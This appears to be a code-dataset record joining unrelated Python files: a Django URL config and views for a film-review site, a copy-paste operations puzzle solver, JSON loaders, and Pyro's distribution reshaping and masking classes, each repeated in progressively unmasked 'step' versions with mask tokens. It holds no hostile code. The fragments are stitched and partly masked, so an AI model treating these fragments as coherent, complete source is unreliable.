"step-5": "\"\"\"\nURL Configuration to test mounting created urls from registries\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nfrom staticpages.loader import StaticpagesLoader\n\n\nstaticpages_loader = StaticpagesLoader()\n\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n # Add base pages urls using the same template\n *staticpages_loader.build_urls([\n \"index\",\n {\n \"template_path\": \"index.html\",\n \"name\": \"foo\",\n \"extra\": \"free for use\",\n },\n ])\n]\n\n# Include another urls map on a sub path\nurlpatterns.append(\n path(\"sub/\", include(\"sandbox.staticpages_testapp.sub_urls\")),\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python3
"""minimum time time to write operations of copy and paste"""
def minOperations(n):
"""
    Calculate the fewest number of operations needed
to result in exactly n H characters in the file
"""
if n <= 1:
return 0
"""loop for n number of times"""
for i in range(2, n + 1):
if n % i == 0:
return minOperations(int(n / i)) + i
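# --- Illustrative check (editor addition) ---
# The recursion sums the prime factors of n: the smallest factor i costs i operations
# (one copy-all plus i - 1 pastes), after which the problem shrinks to n // i.
if __name__ == "__main__":
    print(minOperations(9))   # 6  (9 = 3 * 3 -> 3 + 3)
    print(minOperations(12))  # 7  (12 = 2 * 2 * 3 -> 2 + 2 + 3)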
|
normal
|
{
"blob_id": "f14b9373e9bf1ad7fe2216dfefc1571f5380fb27",
"index": 6528,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef minOperations(n):\n \"\"\"\n a method that calculates the fewest number of operations needed\n to result in exactly n H characters in the file\n \"\"\"\n if n <= 1:\n return 0\n \"\"\"loop for n number of times\"\"\"\n for i in range(2, n + 1):\n if n % i == 0:\n return minOperations(int(n / i)) + i\n",
"step-3": "#!/usr/bin/python3\n\"\"\"minimum time time to write operations of copy and paste\"\"\"\n\n\ndef minOperations(n):\n \"\"\"\n a method that calculates the fewest number of operations needed\n to result in exactly n H characters in the file\n \"\"\"\n if n <= 1:\n return 0\n\n \"\"\"loop for n number of times\"\"\"\n for i in range(2, n + 1):\n if n % i == 0:\n return minOperations(int(n / i)) + i\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.core.paginator import Paginator
from .models import post
from django.contrib.auth.decorators import login_required
from .forms import post_fo
from django.db.models import Q
def index(request):
    """List posts, with optional site filter, text search, rating sort and pagination."""
posts_list = post.objects.all().order_by('-date')
site = request.GET.get('site')
search_text = request.GET.get('search')
if search_text != None:
posts_list = posts_list.filter(Q(title__contains=search_text) | Q(contry__contains=search_text))
if site != 'None' and site != None:
posts_list = posts_list.filter(site=request.GET.get('site'))
if request.GET.get('rate') == 'true':
posts_list = posts_list.order_by('-rate')
paginator = Paginator(posts_list, 15)
page = request.GET.get('page')
posts = paginator.get_page(page)
ratelist = [1,2,3,4,5]
sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']
return render(request, 'index.html',{'posts':posts, 'site':site, 'sitelist':sitelist, 'ratelist':ratelist, 'search':search_text})
def detail(request, post_id):
po = get_object_or_404(post, pk = post_id)
ratelist = [1,2,3,4,5]
return render(request, 'detail.html', {'post':po, 'ratelist':ratelist})
@login_required(login_url = '/login/')
def delet(request, post_id):
po = get_object_or_404(post, pk = post_id)
po.delete()
return redirect(index)
@login_required(login_url = '/login/')
def new(request):
if request.method == 'POST':
form = post_fo(request.POST)
if form.is_valid():
post = form.save(commit = False)
post.date = timezone.now()
post.save()
return redirect(detail, post.id)
else:
form = post_fo()
return render(request, 'new.html', {'form':form})
@login_required(login_url = '/login/')
def update(request, post_id):
po = get_object_or_404(post, pk = post_id)
if request.method == 'POST':
po.site = request.POST.get("site")
po.contry = request.POST.get("contry")
po.genre = request.POST.get("genre")
po.rate = request.POST.get("rate")
po.title = request.POST.get("title")
po.review = request.POST.get("review")
po.date = timezone.now()
po.save()
return redirect(detail, po.id)
else:
return render(request, 'update.html', {'post_id':post_id, 'po':po})
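# --- Illustrative sketch (editor addition, not part of the original app) ---
# The views above import `post_fo` from .forms; a ModelForm consistent with the
# fields handled in update() might look like the following. This is a guess at the
# missing forms module, not its actual contents.
#
# from django import forms
# from .models import post
#
# class post_fo(forms.ModelForm):
#     class Meta:
#         model = post
#         fields = ['site', 'contry', 'genre', 'rate', 'title', 'review']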
|
normal
|
{
"blob_id": "2b88bec388f3872b63d6bfe200e973635bb75054",
"index": 5418,
"step-1": "<mask token>\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n@login_required(login_url='/login/')\ndef update(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n if request.method == 'POST':\n po.site = request.POST.get('site')\n po.contry = request.POST.get('contry')\n po.genre = request.POST.get('genre')\n po.rate = request.POST.get('rate')\n po.title = request.POST.get('title')\n po.review = request.POST.get('review')\n po.date = timezone.now()\n po.save()\n return redirect(detail, po.id)\n else:\n return render(request, 'update.html', {'post_id': post_id, 'po': po})\n",
"step-4": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator\nfrom .models import post\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import post_fo\nfrom django.db.models import Q\n\n\ndef index(request):\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(\n contry__contains=search_text))\n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n ratelist = [1, 2, 3, 4, 5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n return render(request, 'index.html', {'posts': posts, 'site': site,\n 'sitelist': sitelist, 'ratelist': ratelist, 'search': search_text})\n\n\ndef detail(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n ratelist = [1, 2, 3, 4, 5]\n return render(request, 'detail.html', {'post': po, 'ratelist': ratelist})\n\n\n@login_required(login_url='/login/')\ndef delet(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n po.delete()\n return redirect(index)\n\n\n@login_required(login_url='/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form': form})\n\n\n@login_required(login_url='/login/')\ndef update(request, post_id):\n po = get_object_or_404(post, pk=post_id)\n if request.method == 'POST':\n po.site = request.POST.get('site')\n po.contry = request.POST.get('contry')\n po.genre = request.POST.get('genre')\n po.rate = request.POST.get('rate')\n po.title = request.POST.get('title')\n po.review = request.POST.get('review')\n po.date = timezone.now()\n po.save()\n return redirect(detail, po.id)\n else:\n return render(request, 'update.html', {'post_id': post_id, 'po': po})\n",
"step-5": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom django.core.paginator import Paginator\nfrom .models import post\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import post_fo\nfrom django.db.models import Q\n\ndef index(request):\n\n posts_list = post.objects.all().order_by('-date')\n site = request.GET.get('site')\n search_text = request.GET.get('search')\n\n if search_text != None:\n posts_list = posts_list.filter(Q(title__contains=search_text) | Q(contry__contains=search_text))\n \n if site != 'None' and site != None:\n posts_list = posts_list.filter(site=request.GET.get('site'))\n \n\n if request.GET.get('rate') == 'true':\n posts_list = posts_list.order_by('-rate')\n \n paginator = Paginator(posts_list, 15)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n ratelist = [1,2,3,4,5]\n sitelist = ['All', 'Netfilx', 'Watcha', 'Tving', 'Qoop', 'Etc']\n\n return render(request, 'index.html',{'posts':posts, 'site':site, 'sitelist':sitelist, 'ratelist':ratelist, 'search':search_text})\n\n\n\ndef detail(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n ratelist = [1,2,3,4,5]\n\n return render(request, 'detail.html', {'post':po, 'ratelist':ratelist})\n\n@login_required(login_url = '/login/')\ndef delet(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n po.delete()\n\n return redirect(index)\n\n@login_required(login_url = '/login/')\ndef new(request):\n if request.method == 'POST':\n form = post_fo(request.POST)\n if form.is_valid():\n post = form.save(commit = False)\n post.date = timezone.now()\n post.save()\n return redirect(detail, post.id)\n else:\n form = post_fo()\n return render(request, 'new.html', {'form':form})\n\n@login_required(login_url = '/login/')\ndef update(request, post_id):\n\n po = get_object_or_404(post, pk = post_id)\n if request.method == 'POST':\n \n po.site = request.POST.get(\"site\")\n po.contry = request.POST.get(\"contry\")\n po.genre = request.POST.get(\"genre\")\n po.rate = request.POST.get(\"rate\")\n po.title = request.POST.get(\"title\")\n po.review = request.POST.get(\"review\")\n po.date = timezone.now()\n \n po.save()\n return redirect(detail, po.id)\n else: \n return render(request, 'update.html', {'post_id':post_id, 'po':po})\n\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import json
def get_json_data(page):
with open('geekshop/json_data.json', encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data[page]
def get_json_products_data(file_path):
with open(file_path, encoding='utf-8-sig') as file:
json_data = json.load(file)
return json_data
# print(get_json_products_data('geekshop/json_products_data.json'))
# print(get_json_data('products'))
|
normal
|
{
"blob_id": "08b53ba116b0c5875d39af4ce18296d547d5891d",
"index": 5692,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-3": "<mask token>\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-4": "import json\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n",
"step-5": "import json\n\n\ndef get_json_data(page):\n with open('geekshop/json_data.json', encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data[page]\n\n\ndef get_json_products_data(file_path):\n with open(file_path, encoding='utf-8-sig') as file:\n json_data = json.load(file)\n return json_data\n\n\n# print(get_json_products_data('geekshop/json_products_data.json'))\n# print(get_json_data('products'))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import absolute_import, division, print_function
import numbers
import torch
from torch.distributions import constraints
from pyro.distributions.distribution import Distribution
from pyro.distributions.score_parts import ScoreParts
from pyro.distributions.util import broadcast_shape, sum_rightmost
class TorchDistributionMixin(Distribution):
"""
Mixin to provide Pyro compatibility for PyTorch distributions.
You should instead use `TorchDistribution` for new distribution classes.
This is mainly useful for wrapping existing PyTorch distributions for
use in Pyro. Derived classes must first inherit from
:class:`torch.distributions.distribution.Distribution` and then inherit
from :class:`TorchDistributionMixin`.
"""
def __call__(self, sample_shape=torch.Size()):
"""
Samples a random value.
This is reparameterized whenever possible, calling
:meth:`~torch.distributions.distribution.Distribution.rsample` for
reparameterized distributions and
:meth:`~torch.distributions.distribution.Distribution.sample` for
non-reparameterized distributions.
:param sample_shape: the size of the iid batch to be drawn from the
distribution.
:type sample_shape: torch.Size
:return: A random value or batch of random values (if parameters are
batched). The shape of the result should be `self.shape()`.
:rtype: torch.Tensor
"""
return self.rsample(sample_shape) if self.has_rsample else self.sample(sample_shape)
@property
def event_dim(self):
"""
:return: Number of dimensions of individual events.
:rtype: int
"""
return len(self.event_shape)
def shape(self, sample_shape=torch.Size()):
"""
The tensor shape of samples from this distribution.
Samples are of shape::
d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape
:param sample_shape: the size of the iid batch to be drawn from the
distribution.
:type sample_shape: torch.Size
:return: Tensor shape of samples.
:rtype: torch.Size
"""
return sample_shape + self.batch_shape + self.event_shape
def expand(self, batch_shape):
"""
Expands a distribution to a desired
:attr:`~torch.distributions.distribution.Distribution.batch_shape`.
Note that this is more general than :meth:`expand_by` because
``d.expand_by(sample_shape)`` can be reduced to
``d.expand(sample_shape + d.batch_shape)``.
:param torch.Size batch_shape: The target ``batch_shape``. This must
compatible with ``self.batch_shape`` similar to the requirements
of :func:`torch.Tensor.expand`: the target ``batch_shape`` must
be at least as long as ``self.batch_shape``, and for each
non-singleton dim of ``self.batch_shape``, ``batch_shape`` must
either agree or be set to ``-1``.
:return: An expanded version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
batch_shape = list(batch_shape)
if len(batch_shape) < len(self.batch_shape):
raise ValueError("Expected len(batch_shape) >= len(self.batch_shape), "
"actual {} vs {}".format(len(batch_shape), len(self.batch_shape)))
# check sizes of existing dims
for dim in range(-1, -1 - len(self.batch_shape), -1):
if batch_shape[dim] == -1:
batch_shape[dim] = self.batch_shape[dim]
elif batch_shape[dim] != self.batch_shape[dim]:
if self.batch_shape[dim] != 1:
raise ValueError("Cannot broadcast dim {} of size {} to size {}".format(
dim, self.batch_shape[dim], batch_shape[dim]))
else:
raise NotImplementedError("https://github.com/uber/pyro/issues/1119")
sample_shape = batch_shape[:len(batch_shape) - len(self.batch_shape)]
return self.expand_by(sample_shape)
def expand_by(self, sample_shape):
"""
Expands a distribution by adding ``sample_shape`` to the left side of
its :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
To expand internal dims of ``self.batch_shape`` from 1 to something
larger, use :meth:`expand` instead.
:param torch.Size sample_shape: The size of the iid batch to be drawn
from the distribution.
:return: An expanded version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
return ReshapedDistribution(self, sample_shape=sample_shape)
def reshape(self, sample_shape=None, extra_event_dims=None):
raise Exception('''
.reshape(sample_shape=s, extra_event_dims=n) was renamed and split into
.expand_by(sample_shape=s).independent(reinterpreted_batch_ndims=n).''')
def independent(self, reinterpreted_batch_ndims=None):
"""
Reinterprets the ``n`` rightmost dimensions of this distributions
:attr:`~torch.distributions.distribution.Distribution.batch_shape`
as event dims, adding them to the left side of
:attr:`~torch.distributions.distribution.Distribution.event_shape`.
Example::
>>> [d1.batch_shape, d1.event_shape]
[torch.Size((2, 3)), torch.Size((4, 5))]
>>> d2 = d1.independent(1)
>>> [d2.batch_shape, d2.event_shape]
[torch.Size((2,)), torch.Size((3, 4, 5))]
>>> d3 = d1.independent(2)
>>> [d3.batch_shape, d3.event_shape]
[torch.Size(()), torch.Size((2, 3, 4, 5))]
:param int reinterpreted_batch_ndims: The number of batch dimensions
to reinterpret as event dimensions.
:return: A reshaped version of this distribution.
:rtype: :class:`ReshapedDistribution`
"""
if reinterpreted_batch_ndims is None:
reinterpreted_batch_ndims = len(self.batch_shape)
# TODO return pyro.distributions.torch.Independent(self, reinterpreted_batch_ndims)
return ReshapedDistribution(self, reinterpreted_batch_ndims=reinterpreted_batch_ndims)
def mask(self, mask):
"""
Masks a distribution by a zero-one tensor that is broadcastable to the
distributions :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
:param torch.Tensor mask: A zero-one valued float tensor.
:return: A masked copy of this distribution.
:rtype: :class:`MaskedDistribution`
"""
return MaskedDistribution(self, mask)
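# --- Illustrative mask() usage (editor addition, not part of the original module) ---
# Assuming a concrete wrapped distribution such as Pyro's Bernoulli, mask() wraps it
# in the MaskedDistribution defined further below, so log_prob contributions are
# zeroed out wherever the mask is 0:
#
# d = Bernoulli(0.5 * torch.ones(3)).mask(torch.tensor([1., 0., 1.]))
# d.log_prob(torch.zeros(3))   # tensor([-0.6931, 0.0000, -0.6931])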
class TorchDistribution(torch.distributions.Distribution, TorchDistributionMixin):
"""
Base class for PyTorch-compatible distributions with Pyro support.
This should be the base class for almost all new Pyro distributions.
.. note::
Parameters and data should be of type :class:`~torch.Tensor`
and all methods return type :class:`~torch.Tensor` unless
otherwise noted.
**Tensor Shapes**:
TorchDistributions provide a method ``.shape()`` for the tensor shape of samples::
x = d.sample(sample_shape)
assert x.shape == d.shape(sample_shape)
Pyro follows the same distribution shape semantics as PyTorch. It distinguishes
between three different roles for tensor shapes of samples:
- *sample shape* corresponds to the shape of the iid samples drawn from the distribution.
This is taken as an argument by the distribution's `sample` method.
- *batch shape* corresponds to non-identical (independent) parameterizations of
the distribution, inferred from the distribution's parameter shapes. This is
fixed for a distribution instance.
- *event shape* corresponds to the event dimensions of the distribution, which
is fixed for a distribution class. These are collapsed when we try to score
a sample from the distribution via `d.log_prob(x)`.
These shapes are related by the equation::
assert d.shape(sample_shape) == sample_shape + d.batch_shape + d.event_shape
Distributions provide a vectorized
    :meth:`~torch.distributions.distribution.Distribution.log_prob` method that
evaluates the log probability density of each event in a batch
independently, returning a tensor of shape
``sample_shape + d.batch_shape``::
x = d.sample(sample_shape)
assert x.shape == d.shape(sample_shape)
log_p = d.log_prob(x)
assert log_p.shape == sample_shape + d.batch_shape
**Implementing New Distributions**:
Derived classes must implement the methods
:meth:`~torch.distributions.distribution.Distribution.sample`
(or :meth:`~torch.distributions.distribution.Distribution.rsample` if
``.has_rsample == True``) and
:meth:`~torch.distributions.distribution.Distribution.log_prob`, and must
implement the properties
:attr:`~torch.distributions.distribution.Distribution.batch_shape`,
and :attr:`~torch.distributions.distribution.Distribution.event_shape`.
Discrete classes may also implement the
:meth:`~torch.distributions.distribution.Distribution.enumerate_support`
method to improve gradient estimates and set
``.has_enumerate_support = True``.
"""
pass
class ReshapedDistribution(TorchDistribution):
"""
Reshapes a distribution by adding ``sample_shape`` to its total shape
and adding ``reinterpreted_batch_ndims`` to its
:attr:`~torch.distributions.distribution.Distribution.event_shape`.
:param torch.Size sample_shape: The size of the iid batch to be drawn from
the distribution.
:param int reinterpreted_batch_ndims: The number of extra event dimensions that will
be considered dependent.
"""
arg_constraints = {}
def __init__(self, base_dist, sample_shape=torch.Size(), reinterpreted_batch_ndims=0):
sample_shape = torch.Size(sample_shape)
if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape):
raise ValueError('Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), '
'actual {} vs {}'.format(reinterpreted_batch_ndims,
len(sample_shape + base_dist.batch_shape)))
self.base_dist = base_dist
self.sample_shape = sample_shape
self.reinterpreted_batch_ndims = reinterpreted_batch_ndims
shape = sample_shape + base_dist.batch_shape + base_dist.event_shape
batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.event_shape)
batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]
super(ReshapedDistribution, self).__init__(batch_shape, event_shape)
def expand_by(self, sample_shape):
base_dist = self.base_dist
sample_shape = torch.Size(sample_shape) + self.sample_shape
reinterpreted_batch_ndims = self.reinterpreted_batch_ndims
return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)
def independent(self, reinterpreted_batch_ndims=None):
if reinterpreted_batch_ndims is None:
reinterpreted_batch_ndims = len(self.batch_shape)
base_dist = self.base_dist
sample_shape = self.sample_shape
reinterpreted_batch_ndims = self.reinterpreted_batch_ndims + reinterpreted_batch_ndims
return ReshapedDistribution(base_dist, sample_shape, reinterpreted_batch_ndims)
@property
def has_rsample(self):
return self.base_dist.has_rsample
@property
def has_enumerate_support(self):
return self.base_dist.has_enumerate_support
@constraints.dependent_property
def support(self):
return self.base_dist.support
def sample(self, sample_shape=torch.Size()):
return self.base_dist.sample(sample_shape + self.sample_shape)
def rsample(self, sample_shape=torch.Size()):
return self.base_dist.rsample(sample_shape + self.sample_shape)
def log_prob(self, value):
shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])
return sum_rightmost(self.base_dist.log_prob(value), self.reinterpreted_batch_ndims).expand(shape)
def score_parts(self, value):
shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() - self.event_dim])
log_prob, score_function, entropy_term = self.base_dist.score_parts(value)
log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims).expand(shape)
if not isinstance(score_function, numbers.Number):
score_function = sum_rightmost(score_function, self.reinterpreted_batch_ndims).expand(shape)
if not isinstance(entropy_term, numbers.Number):
entropy_term = sum_rightmost(entropy_term, self.reinterpreted_batch_ndims).expand(shape)
return ScoreParts(log_prob, score_function, entropy_term)
def enumerate_support(self):
if self.reinterpreted_batch_ndims:
raise NotImplementedError("Pyro does not enumerate over cartesian products")
samples = self.base_dist.enumerate_support()
if not self.sample_shape:
return samples
# Shift enumeration dim to correct location.
enum_shape, base_shape = samples.shape[:1], samples.shape[1:]
samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape) + base_shape)
samples = samples.expand(enum_shape + self.sample_shape + base_shape)
return samples
@property
def mean(self):
return self.base_dist.mean.expand(self.batch_shape + self.event_shape)
@property
def variance(self):
return self.base_dist.variance.expand(self.batch_shape + self.event_shape)
class MaskedDistribution(TorchDistribution):
"""
Masks a distribution by a zero-one tensor that is broadcastable to the
distribution's :attr:`~torch.distributions.distribution.Distribution.batch_shape`.
:param torch.Tensor mask: A zero-one valued float tensor.
"""
arg_constraints = {}
def __init__(self, base_dist, mask):
if broadcast_shape(mask.shape, base_dist.batch_shape) != base_dist.batch_shape:
raise ValueError("Expected mask.shape to be broadcastable to base_dist.batch_shape, "
"actual {} vs {}".format(mask.shape, base_dist.batch_shape))
self.base_dist = base_dist
self._mask = mask
super(MaskedDistribution, self).__init__(base_dist.batch_shape, base_dist.event_shape)
@property
def has_rsample(self):
return self.base_dist.has_rsample
@property
def has_enumerate_support(self):
return self.base_dist.has_enumerate_support
@constraints.dependent_property
def support(self):
return self.base_dist.support
def sample(self, sample_shape=torch.Size()):
return self.base_dist.sample(sample_shape)
def rsample(self, sample_shape=torch.Size()):
return self.base_dist.rsample(sample_shape)
def log_prob(self, value):
return self.base_dist.log_prob(value) * self._mask
def score_parts(self, value):
return self.base_dist.score_parts(value) * self._mask
def enumerate_support(self):
return self.base_dist.enumerate_support()
@property
def mean(self):
return self.base_dist.mean
@property
def variance(self):
return self.base_dist.variance
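# Illustrative usage sketch for MaskedDistribution (not part of the original module;
# assumes torch.distributions.Normal as the wrapped base distribution):
#
#     import torch
#     from torch.distributions import Normal
#
#     base = Normal(torch.zeros(3), torch.ones(3))            # batch_shape == (3,)
#     masked = MaskedDistribution(base, torch.tensor([1., 0., 1.]))
#     lp = masked.log_prob(torch.zeros(3))
#     # lp[1] == 0 because the mask zeroes out the middle entry's log-probability.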
|
normal
|
{
"blob_id": "0f0ea6f07f9a082042ed9aff7a95d372c32b5a13",
"index": 1897,
"step-1": "<mask token>\n\n\nclass ReshapedDistribution(TorchDistribution):\n <mask token>\n <mask token>\n\n def __init__(self, base_dist, sample_shape=torch.Size(),\n reinterpreted_batch_ndims=0):\n sample_shape = torch.Size(sample_shape)\n if reinterpreted_batch_ndims > len(sample_shape + base_dist.batch_shape\n ):\n raise ValueError(\n 'Expected reinterpreted_batch_ndims <= len(sample_shape + base_dist.batch_shape), actual {} vs {}'\n .format(reinterpreted_batch_ndims, len(sample_shape +\n base_dist.batch_shape)))\n self.base_dist = base_dist\n self.sample_shape = sample_shape\n self.reinterpreted_batch_ndims = reinterpreted_batch_ndims\n shape = sample_shape + base_dist.batch_shape + base_dist.event_shape\n batch_dim = len(shape) - reinterpreted_batch_ndims - len(base_dist.\n event_shape)\n batch_shape, event_shape = shape[:batch_dim], shape[batch_dim:]\n super(ReshapedDistribution, self).__init__(batch_shape, event_shape)\n\n def expand_by(self, sample_shape):\n base_dist = self.base_dist\n sample_shape = torch.Size(sample_shape) + self.sample_shape\n reinterpreted_batch_ndims = self.reinterpreted_batch_ndims\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n def independent(self, reinterpreted_batch_ndims=None):\n if reinterpreted_batch_ndims is None:\n reinterpreted_batch_ndims = len(self.batch_shape)\n base_dist = self.base_dist\n sample_shape = self.sample_shape\n reinterpreted_batch_ndims = (self.reinterpreted_batch_ndims +\n reinterpreted_batch_ndims)\n return ReshapedDistribution(base_dist, sample_shape,\n reinterpreted_batch_ndims)\n\n @property\n def has_rsample(self):\n return self.base_dist.has_rsample\n\n @property\n def has_enumerate_support(self):\n return self.base_dist.has_enumerate_support\n\n @constraints.dependent_property\n def support(self):\n return self.base_dist.support\n\n def sample(self, sample_shape=torch.Size()):\n return self.base_dist.sample(sample_shape + self.sample_shape)\n <mask token>\n\n def log_prob(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n return sum_rightmost(self.base_dist.log_prob(value), self.\n reinterpreted_batch_ndims).expand(shape)\n\n def score_parts(self, value):\n shape = broadcast_shape(self.batch_shape, value.shape[:value.dim() -\n self.event_dim])\n log_prob, score_function, entropy_term = self.base_dist.score_parts(\n value)\n log_prob = sum_rightmost(log_prob, self.reinterpreted_batch_ndims\n ).expand(shape)\n if not isinstance(score_function, numbers.Number):\n score_function = sum_rightmost(score_function, self.\n reinterpreted_batch_ndims).expand(shape)\n if not isinstance(entropy_term, numbers.Number):\n entropy_term = sum_rightmost(entropy_term, self.\n reinterpreted_batch_ndims).expand(shape)\n return ScoreParts(log_prob, score_function, entropy_term)\n\n def enumerate_support(self):\n if self.reinterpreted_batch_ndims:\n raise NotImplementedError(\n 'Pyro does not enumerate over cartesian products')\n samples = self.base_dist.enumerate_support()\n if not self.sample_shape:\n return samples\n enum_shape, base_shape = samples.shape[:1], samples.shape[1:]\n samples = samples.reshape(enum_shape + (1,) * len(self.sample_shape\n ) + base_shape)\n samples = samples.expand(enum_shape + self.sample_shape + base_shape)\n return samples\n\n @property\n def mean(self):\n return self.base_dist.mean.expand(self.batch_shape + self.event_shape)\n\n @property\n def variance(self):\n return self.base_dist.variance.expand(self.batch_shape + 
